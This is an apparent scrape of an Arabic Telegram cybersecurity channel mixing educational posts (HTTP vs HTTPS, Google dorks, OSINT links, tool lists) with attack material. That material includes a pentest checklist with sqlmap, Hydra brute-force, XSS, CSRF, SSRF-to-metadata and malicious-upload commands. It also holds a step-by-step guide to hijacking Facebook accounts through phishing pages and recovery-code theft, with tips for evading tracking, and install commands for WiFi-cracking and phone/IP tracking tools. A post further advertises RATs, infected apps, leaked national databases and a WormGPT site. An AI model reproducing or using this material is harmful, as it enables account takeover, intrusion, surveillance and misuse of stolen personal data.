Yemen Cybersecurity
Kanalga Telegram’da o‘tish
🔐 أمن سيبراني | Cyber Security 📡 نكشف لك أسرار العالم الرقمي! تابعنا لتكون في قلب الأحداث السيبرانية: ✅ دروس وشرح مفاهيم الأمن السيبراني 🧠 تحليلات لهجمات واختراقات حقيقية 🛡️ أدوات وأخبار وتحديثات أمنية يومية 📚 مصادر ودورات احترافية معتمدة
Ko'proq ko'rsatish435
Obunachilar
Ma'lumot yo'q24 soatlar
-17 kunlar
-530 kunlar
Postlar arxiv
HTTP vs HTTPS vs VPNماذا يستطيع مزوّد الإنترنت (ISP) رؤيته؟ 🔸 HTTP ماذا يمكن لمزوّد الإنترنت رؤيته؟ • الرابط كامل (Full URL) — مثال: http://abc.com/messages/name • كل شيء تفعله داخل الموقع: النصوص، الصور، التعليقات، الرسائل… بمعنى: لا يوجد أي تشفير، كل البيانات مكشوفة. 🔸 HTTPS ماذا يمكن لمزوّد الإنترنت رؤيته؟ • اسم الموقع فقط (Domain) — مثال: abc.com • لا يستطيع رؤية الصفحات التي تزورها داخل الموقع: /chat/name • لا يرى محتوى ما ترسله أو تستقبله. بمعنى: اتصال مُشفّر، لكن العنوان الرئيسي ظاهر 🔸 VPN ماذا يمكن لمزوّد الإنترنت رؤيته؟ • يرى فقط أنك متصل بخادم VPN مثال: vpnprovider.com • لا يرى المواقع التي تزورها • لا يرى الصفحات أو المحتوى أو النشاط بمعنى: كل حركة الإنترنت مخفية داخل “نفق مُشفّر”
الخلاصةHTTP = مكشوف بالكامل HTTPS = اسم الموقع فقط VPN = لا شيء تقريبًا (إلا أنك تستخدم VPN) ━━━━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━━━━━━━━━━━
دليلًا شاملاً للمبتدئين الذين يرغبون في دخول مجال تجربة المستخدم (UX) وتصميم الواجهة (UI).
خارطة طريق واضحة ومنهجية تشمل الخطوات الرئيسية لتطوير مهارات تجربة المستخدم وتصميم الواجهة.
بالاضافة لنصائح وأفكار قيمة حول كيفية تحسين مهارات تجربة المستخدم والفهم العميق لاحتياجات المستخدمين.
https://bootcamp.uxdesign.cc/ui-ux-roadmap-for-beginners-6601d15027ca
# دليل خطوة بخطوة لاختبار أمان تطبيقات الويب (بإذن قانوني)
## التحضيرات الأولية
### 1. إعداد البيئة الآمنة
# إنشاء مجلد للاختبار
mkdir security_testing && cd security_testing
# تثبيت الأدوات الأساسية (على Kali Linux أو نظام مشابه)
sudo apt update && sudo apt install -y zaproxy nikto sqlmap nmap wireshark
### 2. الحصول على الإذن القانوني
- الحصول على نموذج موافقة كتابية من مالك النظام
- تحديد نطاق الاختبار (مثال: example.com فقط)
- تحديد موعد الاختبار لتجنب التأثير على الخدمة
## الخطوة 1: جمع المعلومات (Reconnaissance)
### 1. اكتشاف النطاقات الفرعية
python3 sublist3r.py -d example.com -o subdomains.txt
### 2. فحص البنية التحتية
nmap -sV -T4 -A -oN nmap_scan.txt example.com
### 3. تحديد تقنيات المستخدمة
whatweb example.com --color=never > whatweb.txt
## الخطوة 2: فحص SSL/TLS
### 1. فحص شهادات التشفير
testssl.sh example.com > ssl_report.txt
### 2. تحليل التشفير باستخدام Wireshark
wireshark -k -i eth0 -Y "ssl.handshake" -w ssl_capture.pcap
## الخطوة 3: اختبار الواجهة الأمامية
### 1. فحص عام باستخدام OWASP ZAP
zap.sh -cmd -quickurl https://example.com -quickout zap_report.xml
### 2. اكتشاف الملفات المخفية
nikto -h https://example.com -output nikto_scan.html
## الخطوة 4: اختبار APIs
### 1. اكتشاف نقاط نهاية API
python3 dirsearch.py -u https://api.example.com -e json -o api_endpoints.txt
### 2. اختبار API باستخدام Postman
# إنشاء مجموعة اختبار في Postman
# إرسال طلبات إلى:
GET https://api.example.com/v1/users
GET https://api.example.com/v1/users/123
## الخطوة 5: اختبار المصادقة والجلسات
### 1. اختبار قوة كلمة المرور
# استخدام Hydra للاختبار القانوني (بإذن)
hydra -l admin -P passwords.txt example.com http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
### 2. اختبار إدارة الجلسات
# تعديل ملفات تعريف الارتباط باستخدام Cookie-Editor
# اختبار Session Fixation:
1. الحصول على sessionid
2. إجبار المستخدم على استخدام نفس sessionid
3. التحقق من الوصول
## الخطوة 6: اختبار الثغرات الشائعة
### 1. اختبار SQL Injection
sqlmap -u "https://example.com/products?id=1" --risk=1 --level=1 --batch --output-dir=sqlmap_report
### 2. اختبار XSS
# اختبار Stored XSS
curl -X POST -d "comment=<script>alert('XSS')</script>" https://example.com/comments
# اختبار Reflected XSS
curl "https://example.com/search?q=<script>alert('XSS')</script>"
### 3. اختبار CSRF
# إنشاء نموذج HTML مزيف
echo '<form action="https://example.com/change-password" method="POST">
<input type="hidden" name="new_password" value="hacked">
</form>' > csrf_test.html
## الخطوة 7: اختبار التحكم في الوصول
### 1. اختبار IDOR
curl -H "Authorization: Bearer USER_TOKEN" https://example.com/api/users/12345
### 2. اختبار Privilege Escalation
# محاولة الوصول لوظائف إدارية
curl -H "Authorization: Bearer USER_TOKEN" https://example.com/admin/dashboard
## الخطوة 8: اختبار SSRF
# اختبار طلبات داخلية
curl "https://example.com/fetch?url=http://169.254.169.254/latest/meta-data"
## الخطوة 9: اختبار Upload Vulnerabilities
# محاولة رفع ملف خبيث
curl -X POST -F "file=@malicious.php" https://example.com/upload
## الخطوة 10: تحليل النتائج
### 1. إنشاء تقرير شامل
cat *.txt *.html *.xml > final_report.md
### 2. تصنيف الثغرات حسب الخطورة
# استخدام معيار CVSS
echo "1. SQL Injection - CVSS:9.8" >> vulnerabilities_ranked.txt
echo "2. XSS - CVSS:6.1" >> vulnerabilities_ranked.txt
## نصائح أمنية إضافية
1. الاختبار على بيئة تطوير أولاً:
# استخدام نسخة محلية للاختبار
docker run --rm -it vulnerables/web-dvwa
2. تحديث الأدوات باستمرار:
sudo apt update && sudo apt upgrade -y
3. توثيق كل خطوة:
# تسجيل أوامر التاريخ
script -a testing_session.log
## إجراءات ما بعد الاختبار
1. تنظيف البيانات الاختبارية
# حذف الحسابات الاختبارية
curl -X DELETE https://example.com/api/test-usersمن PC0 في شبكة 1:
C:\> ping 192.168.2.10 # يجب أن يعمل (لاختبار الاتصال بين الشبكتين)
من R1:
R1# ping 10.0.0.2 # لاختبار الاتصال مع R2
R1# ssh -l admin 10.0.0.2 # للاتصال بـ R2 عبر SSH
من R2:
R2# ping 10.0.0.1 # لاختبار الاتصال مع R1
R2# ssh -l admin 10.0.0.1 # للاتصال بـ R1 عبر SSH
---مواقع راح تفيدك إذا تريد تدخل مجال جمع معلومات:
Username أو Alias Checkers – يفحصلك اذا الاسم مستخدم بمواقع مختلفة - http://namechk.com/ – يكلك الاسم موجود بأي موقع اجتماعي او دومين - http://knowem.com/ – نفس الشي يشيك على السوشال ميديا والدومينات - http://www.namecheckr.com/ – يبحث عن توافر الاسم على المنصات - http://checkusernames.com/ – يشوف وين الاسم مستخدم - http://usersherlock.com/ – يبحث عن اليوزر نيم على النت كله - https://www.usersearch.org/ – يطلعلك أماكن تواجد الاسم على الانترنت Archive Tools – أرشيف وحفظ نسخة من المواقع والصفحات القديمة - https://archive.org/index.php – أرشيف الانترنت تقدر تشوف نسخ قديمة من المواقع - https://www.archive-it.org/ – أرشيف خاص بالمنظمات والويب Social Networks و People Finders – البحث عن أشخاص ومواقعهم على السوشال ميديا - http://www.yasni.com/ – يطلعلك معلومات عن الأشخاص حسب الاسم - http://socialmention.com/ – يبحث عن اسمك او موضوع على السوشال ميديا - http://www.whostalkin.com/ – يشوف من يحچي عنك او موضوعك - http://www.linkedin.com/ – الشبكة المهنية للبحث عن أشخاص وشغلهم - http://www.formspring.me/ – أسئلة واجوبة عن الأشخاص (قديم) - http://foursquare.com/ – يبين أماكن تواجد الأشخاص - https://about.me/ – صفحة شخصية مختصرة لأي شخص - https://profiles.google.com/ – بروفايلات جوجل - http://blogger.com – مدونات الناس - https://twitter.com/ – تويتر - http://www.facebook.com/ – فيسبوك - https://deviantart.com – فنون وأعمال المستخدمين - http://xanga.com/ – مدونات قديمة - http://tumblr.com/ – مدونات وصور وفيديو - http://myspace.com/ – الشبكة القديمة للموسيقى - http://www.photobucket.com/ – صور المستخدمين - http://www.quora.com/ – أسئلة وأجوبة - http://www.stumbleupon.com/ – مواقع ومقالات الناس يشاركوها - http://www.reddit.com – منتديات ومجتمعات - http://www.digg.com – مشاركة الأخبار والمقالات - http://www.plixi.com – رفع ومشاركة الصور - http://pulse.yahoo.com/ – أخبار ومحتوى من ياهو - http://www.flickr.com/ – صور وفوتوغرافي Phone Number Lookup – يفحصلك أرقام الهاتف - http://www.numberway.com/ – معلومات عامة عن الرقم - http://www.fonefinder.net – يبينلك مكان الرقم وأحياناً مزود الخدمة IP Address Info – معلومات عن أي IP - http://www.infosniper.net/ – يبينلك مكان الIP - http://ip-lookup.net/ – معلومات عن الIP والمزود - http://whatstheirip.com – يعرض مكان الIP - http://getthierip.com – نفس الشي WHOIS / Website Recon – معلومات عن المواقع والدومينات - https://www.whois.net/ – بيانات الدومين ومالك الموقع - http://whois.icann.org/en – معلومات رسمية عن الدومين - https://who.is/ – بيانات الدومين - http://www.whois.com/whois – معلومات مفصلة عن الموقع - http://www.whois.com/ – نفس الشي - http://www.statsinfinity.com/ – تحليل المواقع والاحصائيات Image Lookup – البحث عن الصور ومصدرها - http://www.tineye.com/ – يبحثلك عن الصور وين موجودة على الانترنت - http://saucenao.com/ – يبحثلك عن الصور للأنمي والفنون - http://www.photobucket.com/ – صور المستخدمين - https://images.google.com/?gws_rd=ssl – بحث جوجل بالصور
شرح كيف تُكَـ؍ـسًـرَ المصادقة الثنائية لتطبيق فيسبوك ربط yopmail
حقوق قناة FoxKio
الخطوة الأولى: آسًـتُـ؍ـغّـلَآلَ فيسبوك و yopmail مباشرةً
1. اسوي حساب وُهِـ؍ـمِـيّ على فيسبوك :
- انشئ حساب جديد بواسطة بريد yopmail (لأن yopmail ما يطلب مصادقة ثنائية).
- اضيف آلَضـحًـ؍ـيّة كصديق وارسل له رسالة فيها رابط مِـزَ؍يّفُ (مثل صفحة زَآئـ؍ـفُة تشبه صفحة فيسبوك Login) عشان يضغط عليه ويدخل بياناته.
2. استخدم yopmail لاستلام رموز الاستعادة :
- إذا آلَضـحًـ؍ـيّة نسي كلمة السر، روح لفيسبوك واطلب "نسيت كلمة السر"، وأدخل بريد yopmail تاعك.
- الرسالة راح توصل لبريد yopmail، وانت ادخل عليه بدون مصادقة ثنائية وخذ الرمز.
3. آسًـ؍ـتُغّـلَ خاصية "تسجيل الدخول بقوقل أو فيسبوك" :
- إذا آلَضـحًـ؍ـيّة مسوي حساب على yopmail باستخدام فيسبوك أو قوقل، حاول آخٌـ؍ـتُرَآقَ حسابه على فيسبوك أولاً عشان تتحكم بحساب yopmail تبعته.
الخطوة الثانية : هِجَـ؍ـمِـآتُ آلَتُصِـ؍ـيّدُ (Phishing) من الموبايل
- سوي صفحة تصيد مِـزَ؍يّفُة :
- استخدم مواقع مجانية مثل Google Forms أو خدمة استضافة بسيطة عشان تنشئ صفحة تشبه تماماً صفحة دخول فيسبوك أو قوقل.
- اربط الصفحة برابط مختصر (مثل bit.ly) عشان ما يشك آلَضـحًـ؍ـيّة.
- ارسل الرابط للضحية :
- عبر فيسبوك ماسنجر، واتساب، أو حتى SMS.
- اكتب رسالة مقنعة مثل "حسابك فيه مشكلة، اضغط هنا عشان تسوي تحديث".
- استلم البيانات :
- لما يضغط الضحية ويدخل بياناته، راح توصلك لصفحة التصيد أو لبريد yopmail إذا استخدمته.
الخطوة الثالثة آسًـتُـ؍ـغّـلَآلَ ثغرات في التطبيقات :
- جرب خيار "إعادة إرسال الرمز" :
- إذا طلبت منك المصادقة الثنائية رمز، اضغط "إعادة إرسال الرمز" واختار الإرسال لبريد بديل (مثل yopmail) أو رقم بديل إذا عندك الوصول له.
- استخدم تطبيقات تسجيل الشاشة (إذا تقدر توصل للموبايل physically) :
- نزل تطبيق مثل AZ Screen Recorder وسجل شاشة آلَضـحًـ؍ـيّة وهو يدخل رمز المصادقة.
الخطوة الرابعة: ربط yopmail بالحساب
- روح لإعدادات الحساب في فيسبوك أو قوقل، واضف بريد yopmail كبريد إضافي أو اساسي.
- بعدين، إذا احتجت رمز مصادقة، اطلب إرساله لبريد yopmail - لأنه ما عليه حماية ثنائية.
نصائح مهمة :
- استخدم شبكة Wi-Fi عامة (مثل مقاهي الإنترنت) عشان ما تتعقب.
- غير إعدادات الخصوصية في yopmail عشان ما تترك traces.
- إذا ما نجحت، جرب هِجَـ؍ـمِـآتُ تُصِـ؍ـيّدُ برسائل SMS باستخدام خدمات إرسال مجهولة.
يولد الي راح اسوي من بوت هو بوت ازرار بي كل شي تحتاجه من ادوات واشياء تفيدكم، وهذه هو جدول البوت:
قسم البايثون:
ادوات صيد
ادوات تخمين
ادوات خدمات
الخ من ادوات البايثون...
قسم التيرمكس:
ادوات الاستخبارات الرقمية
ادوات التخمين
ادوات الصيد
ادوات اخت//راق الشبكات
تنصيب الانظمة في تيرمكس
ادوات استضافة
قسم ال php
بوت دعمكم
بوت ازرار
بوت تواصل
بوت ازالة ريبوستات تيك توك
بوت ازالة متابعين تيك توك
بوت ازالة فيديوهات التيك توك
بوت تحويل الفيديوهات الى الخاصه في التيك توك
بوت رشق مشاهدات تيك توك ( فقط مشاهدات )
بوت رشق اكسبلور تيك توك ( اكسبلور يصعد الفيديو بس مو لدرجه يوصل 1M بكم ساعه )
بوت رشق مشاهدات انستا ( فقط مشاهدات )
بوت رشق اكسبلور انستا
الخ...
قسم المواقع
موقع سحب معلومات جهازك
موقع سحب معلومات التيك توك
موقع سحب معلومات الانستا
موقع سحب معلومات الفيسبوك
موقع سحب معلومات اليوتيوب
موقع بحث في السوشل ميديا ( تختار المنصه الي تبحث بيهه )
موقع ذكاء اصطناعي
موقع worm gpt ( اذا كدرت اسويه )
موقع فحص التلغيم في الروابط والصور
موقع محاكاة للتيرمكس ( يكون مثل التيرمكس العادي بس على شكل موقع، يفيد جماعة اللابتوب الي ما يكدرون يثبتون كالي لينكس وما يريدون يثبتون محاكي )
موقع محاكاة كالي لينكس ( نفس محاكاة التيرمكس، اذا كدرت اسوي ارفعه بل بوت )
موقع تواصل وياك ( اذا جنت تعرف تطور الموقع هذه الملف يفيدك حتى تتواصل وي الناس بدون ما يعرفون رقمك او ايميلك وتوصلك الرسائل على حسب المنصة الي يختارهه المستخدم اذا كانت تيليجرام توصلك بل بوت واذا واتساب توصلك من خلال رقمة واذا ايميل توصلك برسائل الايميل )
قسم المبرمجين
Apis Tik Tok
Apis Instagram
Apis Youtube
Apis X
Apis Telegram
Apis Snapchat
Apis Discord
Apis Roblox
Apis SafeUM
Apis eFootball
Apis GitHub
واذا ما كدرت اجيب كل الApis ما انشر الي ما جبتهن
قسم الكالي لينكس
ما راح اكول شنو موجود بهذه القسم لان بي هواي اشياء 🗿
قسم سورسات بايثون المطلوبة والمهمة لكل مبرمج مبتدا
سورس الارسال الى البوت في تيليجرام
سورس باسورد ل اداتك
سورس اختيار الوان عشوائية ل اللوكو مال اداتك
سورس انشاء لوكو ل اداتك
سورس سحب خدمات المواقع
سورس مسح الصور
سورس مسح الفيديوهات
سورس مسح الصور والفيديوهات
سورس الاشتراك الاجباري في بوتك
سورس بوت الازرار
سورس زخرفة اسمك بل عربي
سورس زخرفة اسمك بل الانجليزي
سورس تخمين بروكسيات
سورس فحص اتصال شبكة الواي فاي
سورس زرع ملف خفي في جهاز الضحية
سورس ارسال الـ ip address الى بوتك
سورس ارسال معلومات الي يكتبهة المستخدم بل اداة الى بوتك
سورس انشاء يوزرات تيك توك
سورس انشاء يوزرات انستا
سورس باسورد لبوتك
قسم تطبيقات الرات
تطبيق crax rat 6.7 7.0 7.1 7.4
تطبيق Xhunter
تطبيق ZEXR RAT
تطبيق Covid20
تطبيق SK Spy
تطبيق Cypher Rat
تطبيق MR.OCTOPUS RAT
تطبيق Chinese Rat
قسم الفيروسات
ما اكدر اكتبهم لان فوك 1300 تطبيق ملغم 😅
قسم الكورسات
python
php
html
css
javascript
java
ruby
الخ من اللغات...
قواعد البيانات
البطاقة التموينية العراقيه
بيانات تيليجرام
بيانات GitHub
قاعدة بيانات السعودية
قاعدة بيانات اسرائيل
قاعدة بيانات الفيسبوك
قاعدة بيانات خط الاسيا
وبعد هواي ما ذكرت...
تجميعات
ادوات بايثون
بوتات php
مواقع html
سورسات python
بلوكات سكويتشر
فيروسات
خلفيات مبايل تفيدك اذا تسوي فيروس
اصوات عشوائية تفيدك اذا تسوي فيروس
باسوردات
ايميلات
ارقام كل دول العربية
قنوات راديو هواي واحتمال اخلي كل القنوات الراديو
كورسات اللغات البرمجية
كورسات تعلم الثغرات
كورسات تعلم الامن السيبراني
كورسات تعلم الاختراق
كورسات تعلم برمجة الهاتف
كتب الابتدائية كاملة pdf
كتب المتوسطة كاملة pdf
كتب الاعداية كاملة pdf
كتب الجامعة كلهه وكاملة pdf
كتب عشوائية وفلسفية pdf
كتب روايات كاملة pdf
وبعد راح اضيف اقسام هواي بس ما اكدر اكمل كتابه لان هواي 😅❤
أداة قوية للمبرمجين وأمن المعلومات 🔥اسم الأداة: Sherlock وظيفتها: البحث عن حسابات شخص معين في أكثر من 300 موقع تواصل اجتماعي باستخدام اسم المستخدم فقط! طريقة الاستخدام: 1️⃣ حمل الأداة من GitHub باستخدام الأمر: git clone https://github.com/sherlock-project/sherlock.git 2️⃣ ادخل لمجلد الأداة:
cd sherlock3️⃣ ثبت المتطلبات:
pip install -r requirements.txt4️⃣ ابحث عن أي شخص بكتابة:
python sherlock username(استبدل username باسم المستخدم اللي بتدور عليه) رابط الأداة على GitHub: https://github.com/sherlock-project/sherlock
طلبات واستجابات HTTP — ببساطة متى بتحصل؟لما تفتح موقع أو تستخدم أداة زي curl — المتصفح (=العميل) يرسل طلب (Request) والسيرفر يرد استجابة (Response). الطلب (Request) الطريقة (Method): زي GET (جلب) أو POST (إرسال بيانات). المسار (Path): العنوان داخل الموقع، مثلاً: /users/login.html. الإصدار (Version): زي HTTP/1.1 أو HTTP/2. الرؤوس (Headers): بيانات إضافية — مثال: User-Agent يوضح نوع المتصفح أو الأداة. الجسم (Body): موجود لما تبعث بيانات (مثلاً فورم أو JSON مع POST). الاستجابة (Response) كود الحالة: زي 200 OK (نجح)، 401 Unauthorized (مرفوض)، إلخ. رؤوس الاستجابة: مثل Date، Content-Type (نوع البيانات). المحتوى: HTML، JSON، صورة... إلخ. 🛠️ مثال عملي باستخدام curl عرض كامل للطلب والاستجابة
curl example.com -v # أو لمزيد من التفاصيل: curl example.com -vvv
جزء من الطلب اللي هتشوفه:
GET / HTTP/1.1 Host: example.com User-Agent: curl/8.9.1 Accept: */*
وجزء من الاستجابة:
HTTP/2 200 content-type: text/html; charset=UTF-8 date: Sat, 04 Jan 2025 19:17:30 GMT ... <!doctype html><html> ...</html>
⚠️ ملاحظة أمان مهمة (HSTS)لو دخلت http://example.com المفروض يتحول تلقائيًا إلى https://example.com. إذا ما حدث التحويل — دي ممكن تُعد ثغرة اسمها Lack of HTTP Strict Transport Security (HSTS). يعني: الموقع بيعرض بيانات غير مؤمنة (عرضة للاعتراض أو التلاعب).
✅ خلاصة سريعة (TL;DR):المتصفح يرسل طلب، والسيرفر يرد استجابة. راقب الطريقة، الرؤوس، وكود الحالة عشان تفهم المشكلة أو الهجوم. دايمًا فضّل https — واطمئن على تفعيل HSTS في المواقع الحساسة.
سؤال سريع للمتابعين (Engage):ما الفرق بين GET و POST؟ اكتب إجابتك في التعليقات — أفضل إجابة راح أنشر ها في القناة!
Google Dorks — كيف تغوغل صحّ؟
مرحبًا، بكم في السيبراني العربي. 🎩
قليل من الناس يستغلون قوة Google Dorks بالرغم من أنها أداة فعّالة جدًا في جمع المعلومات العلنية (OSINT).
الفكرة بسيطة: نستخدم مُشغّلات ومحارف بحث خاصة عشان نفلتر نتائج جوجل ونطلع بيانات دقيقة بسرعة.
أمثلة على مشغّلات مفيدةfiletype: — حدّد نوع الملفات (مثال: filetype:pdf للبحث عن ملفات PDF). site: — اقتصر البحث على دومين معيّن (مثال: site:example.com). intitle: — ابحث عن كلمات في عنوان الصفحة (title). inurl: — ابحث عن كلمات موجودة في عنوان URL. intext: — ابحث عن كلمات داخل محتوى الصفحة. cache: — استعرض النسخة المخبأة (cached) من صفحة ما.
استخدام عملي مبسّطللبحث عن ملفات DOCX داخل موقع حكومي:
site:gov.example filetype:docx
للعثور على صفحات تحمل كلمة محددة في العنوان:
intitle:"admin panel"
مصادر مفيدة1. www.google-dorking.com/ 2. www.dorksearch.com/ ━━━━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━━━━━━━━━━━
https://youtube.com/playlist?list=PLMBrCbpISK2mk18Le4NTSbwDpTC7jrrso&si=aA8rEmdWBtfTMkRI
كورس شرح متكامل للمنطق الرياضي رياضيات متقطعه
اداة اختراق شبكات الوايفاي 😒
مميزات الاداة ✅
1) بدء وضع المراقبة
2) إيقاف وضع المراقبة
3) فحص الشبكات
4) الحصول على مصافحة (Handshake)
5) إنشاء قائمة كلمات مرور
6) تثبيت أدوات الشبكات اللاسلكية
7) هجمات على شبكات WPS
8) فحص شبكات WPS
9) كسر المصافحة باستخدام rockyou.txt
10) كسر المصافحة باستخدام قائمة كلمات المرور
11) كسر المصافحة بدون قائمة كلمات المرور
للتثبيت علي الكالي 🔥
sudo apt-get update && apt-get install git
git clone https://github.com/U7P4L-IN/WIFI-HACKING.git
ls
cd WIFI-HACKING
ls
sudo python3 WIFI.py
للتثبيت علي التريمكس 🔥
apt update
apt install git
apt install python
apt install python3
apt install cmatrix
rm -rf WIFI-HACKING
git clone --depth=1 https://github.com/U7P4L-IN/WIFI-HACKING.git
cd WIFI-HACKING
ls
python WIFI.py ـــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ
مراجع اختبار الاختراق و CheatSheets
• Hacking Articles
• Hack Tricks
• Cloud Hack Tricks
• Chryzsh Pentest Book
• Total OSCP Guide
• Hack The Box OSCP Preparation
• Steflan Security
• SecWiki
• Hausec
• HighOnCoffee
• six2dez pentest-book
• 0xffsec Handbook
• haax's Cheatsheet
• golinuxcloud
• Pentest Monkey
• Web App Testing Guide
• XSS CheatSheet
• Payload Box
• Steganography Tools
• Metasploit Unleashed
• Payloads All The Things
• Mobile Security Testing Guide
• WADComs
• LOLBAS
• explainshell
أداة ZMap هي أداة مسح شبكات مفتوحة المصدر ومصممة لمسح الانترنت بسرعات عالية لأغراض أمان واختبار الشبكات.
الريبو الرسمي للأداة وكل تفاصيلها وطرق تشغيلها: GitHub - ZMap
أداة Cowrie
أداة Cowrie هي honeypot مفتوحة المصدر بتشتغل على محاكاة خادم SSH أو Telnet عشان تراقب محاولات الاختراق وتجمع عنها معلومات حقيقية من غير ما المهاجم يعرف أنه مترصد
من مميزاتها أنها بتسجل كل محاولات الدخول والأوامر اللي المهاجم بيكتبها وكمان الملفات اللي بيحاول ينزلها بتتعامل كأنها جهاز فعلي وهاد بيساعدك تراقب وتحلل سلوك المهاجمين بدقة من غير أي ضرر
GitHub - Cowrie
🔍 أداة GhostTrack لتتبع المواقع عبر الهاتف أو عنوان الـ IP
أداة قوية تمنحك معلومات دقيقة عن:
🌍 الدولة
🏙️ المدينة
📍 المنطقة
📞 رقم الهاتف أو 💻 عنوان الـ IP
📦 المميزات:
تعقب الهاتف بسهولة
تتبع عنوان IP مباشر
عرض الموقع الجغرافي بدقة
⚙️ طريقة التثبيت والتشغيل:
apt update apt upgrade pkg install git pkg install python3 git clone https://github.com/HunxByts/GhostTrack.git cd GhostTrack pip3 install -r requirements.txt python3 GhostTR.py
🚀 ابدأ التتبع الآن واكتشف معلومات دقيقة ومفصلة!
📌 لا تستخدم الأداة لأغراض غير قانونية.🛡️ اهم ادوات الأمن السيبراني بحسب الفئة 🔥 .
1️⃣جمع المعلومات: Nmap Shodan Maltego TheHavester Recon-NG Amass Censys OSINT Framework Gobuster
2️⃣ الاستغلال: Burp Suite Metasploit Framework SQL Map ZAP ExploitDB Core Impact Cobalt Strike
3️⃣ تكسير كلمات المرور: John The Ripper Hydra Hashcat OPHCrack Medusa THC-Hydra Cain & Abel
4️⃣ مسح ثغرات الامنية: OpenVAS Nessus AppScan LYNIS Retina Nexpose
5️⃣ هندسة البرمجياة: GoPhish HiddenEye SocialFish EvilURL Evilginx
6️⃣ التحليل الجنائي: SluethKit Autopsy Volatility Guymager Foremost Binwalk Wireshark
7️⃣ القرصنة اللاسلكية: Aircrack-NG Wifite Kismet TCPDump Airsnort Netstumbler Reaver
8️⃣ تقييم حماية تطبيقات الويب: OWASP ZAP Burp Suite Nikto ZAP WPScan Gobuster App Spider
اساسيات او مكاتب تيرمكس
termux-setup-storage
apt update
pkg update
apt upgrade
pkg upgrade
pkg install git -y
pkg install python -y
apt update
apt upgrade
pkg install git
pip install rich
pip install bs4
pip install requests
pip install mechanize
termux-setup-storage
pkg install python -y
pkg install python2 -y
pkg install git -y
pkg install bash -y
pkg install figlet -y
pkg install toilet -y
pkg install nano -y
pkg install php -y
pkg install pip -y
pkg install ruby -y
pkg install openssh -y
pkg install wget -y
pkg install curl -y
pkg install proot -y
pkg install pip2 -y
pip install future
pip2 install requests
pkg install ruby
gem install lolcat
pip2 install requirements
pip2 install mechanize❗| اداة : IP-info
⁞ الاوامـــــــــــــــــــــــر :
$ apt update
$ apt upgrade
$ pkg install git
$ git clone https://github.com/IVAN-DARK/IP-info
$ cd IP-info
$ bash install.sh
$ IP-info ( هنا تكتب الـ الايبي اللي تريد تفحصه)
⁞ و حتى تلغى تثبيت الاداة :
$ cd IP-info
$ bash uninstall.sh🎯 أفضل أدوات اختبار الاختراق واكتشاف الثغرات - إصدار المحترفين 💻🔥
🔐 1- Lynis
أداة تحليل أمني متقدمة لأنظمة Linux وUnix.
📌 تفيد في: فحص النظام، تقوية الإعدادات، كشف الثغرات المخفية.
🌀 2- WPScan
حل ذكي لفحص مواقع WordPress ضد الهجمات.
📌 وظائفه: يتتبع إضافات الموقع، يفحص قواعد البيانات، يولد تقارير مفصلة.
📶 3- Aircrack-ng
موجه لمحترفي اختراق الشبكات اللاسلكية.
📌 مميز بـ: قدرته على فك تشفير WEP/WPA، ويدعم عدة منصات.
🌐 4- BeEF
يركّز على استغلال متصفحات الضحية في بيئات واقعية.
📌 مثالي لـ: الهجمات من طرف العميل، فحص أمان المتصفح.
💥 5- Hydra
سلاح فعال لكسر كلمات المرور عبر بروتوكولات متعددة.
📌 يدعم: FTP / SSH / HTTP / RDP وغيرها، ويُعرف بسرعته.
🛠️ 6- Metasploit
أشهر بيئة لاختبار الاختراق على الإطلاق.
📌 يُستخدم لـ: تطوير الثغرات، تنفيذ هجمات، تحليل الأنظمة.
🔎 7- Skipfish
ماسح سريع ومصمم لاختبار أمان تطبيقات الويب.
📌 النتيجة: تقارير واضحة وسهلة الفهم حتى لغير المتخصصين.
🧠 8- Maltego
أداة قوية لرسم خرائط البيانات والعلاقات.
📌 أبرز استخداماتها: تحقيقات OSINT، تحليل الروابط بين الأشخاص والأنظمة.
🧪 9- Nessus
أداة تجارية لكنها موثوقة لفحص أنظمة الشبكة.
📌 مميزاتها: تقارير إصلاح الثغرات، تقييم مستوى الخطورة، نسخ فردية مجانية.
🌍 10- Burp Suite Scanner
مصمم لفحص تطبيقات الويب من حيث الأمان والثغرات.
📌 مناسب لـ: الباحثين الأمنيين والمطورين، يدعم فحص XSS / SQLi.
Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
